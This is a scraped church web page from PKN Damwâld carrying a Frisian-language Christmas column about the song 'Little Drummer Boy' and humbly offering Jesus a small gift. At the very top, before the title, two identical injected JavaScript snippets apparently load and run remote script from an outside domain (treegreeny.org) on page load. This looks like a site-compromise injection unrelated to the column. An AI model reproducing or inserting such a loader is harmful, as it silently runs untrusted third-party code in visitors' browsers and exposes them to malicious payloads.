;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Little drummer boy - PKN Damwâld

Little drummer boy

Gepubliceerd op: vrijdag 24 november 2023

As Jo it opskrift boppe dizze column lêze tinke Jo miskien: ‘Wat sille wy no hawwe, in column yn  it Ingelsk’. Mar dêr sil ik my net oan weachje, ik hâld it mar by ús eigen moaie taal. Ferline jier haw ik in bydrage skreaun oer it liet: ‘Mary did you know’ en yn dyselde bydrage ek efkes it liet ‘little drummer boy’oanhelle. Wêr ‘t yn it liet ‘Mary did you know’ de klam leit op wat Maria yn it ferrin fan har libben beseft leit yn it liet ‘little drummer boy’ de klam op wat in lytse jonge meimakket. Yn it liet wurdt beskreaun hoe ‘t in lytse jonge oan it krekt berne berntsje Jezus in kado jaan wol mar hy kin oan Jezus net in tastbaar kado jaan. Hy is ommers te earm om foar Jezus wat keapje te kinnen. Mar hy fynt der wat op: Hy hat in hiel ienfâldige trommel en hy beslút om oan It Bern in serenade te bringen.

En sjochdêr, Maria knikt him blier ta en it bern Jezus laket nei him. Ik kin jim oanriede om ris goed te harkje nei de tekst fan dit liet. Sels hear ik der it leafste nei yn de útfiering troch Johnny Cash. As ik der nei harkje dan sjoch ik it taferiel foar my. It lyts jonkje, wat skruten, dy ‘t by Jezus komt (sjoch ik yn sekere sin mysels hjir yn ?) om Jezus in kado te jaan. Mar hy seit der earlik by: Ik kin net in grut kado foar Jo keapje want dêr haw ik gjin jild foar. Mar…………ik haw hjir myn trommeltsje en ik wol graach wat foar Jo spylje.

En hy sjocht dan dat Maria it hiel moai fynt en dat it berntsje Jezus him blier talaket. Jezus genietet selfs fan in lyts kado as dat Him mei ynmoed brocht wurdt. Wat let ús om Jezus yn de oanrin nei Kryst in kado te jaan yn de foarm fan it oannimmen fan syn jefte foar ús. Hy kaam foar Jo / my  op ierde en as Jo / ik dat oannimme wol sil It Bern wer blier laitsje.

 

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns